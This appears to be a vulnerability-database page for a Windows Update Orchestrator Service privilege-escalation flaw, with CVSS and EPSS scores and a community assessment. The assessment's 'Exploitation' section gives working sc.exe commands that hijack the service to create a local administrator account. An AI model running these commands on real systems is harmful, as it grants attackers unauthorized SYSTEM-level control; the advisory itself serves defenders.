7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
0.001 Low
EPSS
Percentile
41.2%
An elevation of privilege vulnerability exists when Windows improperly handles authentication requests, aka ‘Microsoft Windows Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2019-1320, CVE-2019-1340.
Recent assessments:
goodlandsecurity at March 25, 2020 3:59pm UTC reported:
This is an elevation of privilege vulnerability that exists when Windows improperly handles authentication requests by leveraging the Update Orchestrator Service. If an attacker successfully exploits this vulnerability they can run processes in an elevated context.
Prerequisite:
The Update Orchestrator Service runs as NT AUTHORITY\SYSTEM and any user in the group NT AUTHORITY\SERVICE have full access to modify the service.
It is known to affect Windows 10 1803 and above that have not been updated with the November 12th, 2019 security update patch (or above).
Exploitation:
Create tmpUser, add to local administrators group, and reset the service to its default state.
sc.exe stop UsoSvc
sc.exe config UsoSvc binPath="cmd /c net user /add tmpUser tmpPassword123"
sc.exe start UsoSvc
sc.exe stop UsoSvc
sc.exe config UsoSvc binPath="cmd /c net localgroup Administrators /add tmpUser"
sc.exe start UsoSvc
sc.exe stop UsoSvc
sc.exe config UsoSvc binPath="C:\Windows\System32\svchost.exe -k netsvcs -p"
sc.exe start UsoSvc
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
0.001 Low
EPSS
Percentile
41.2%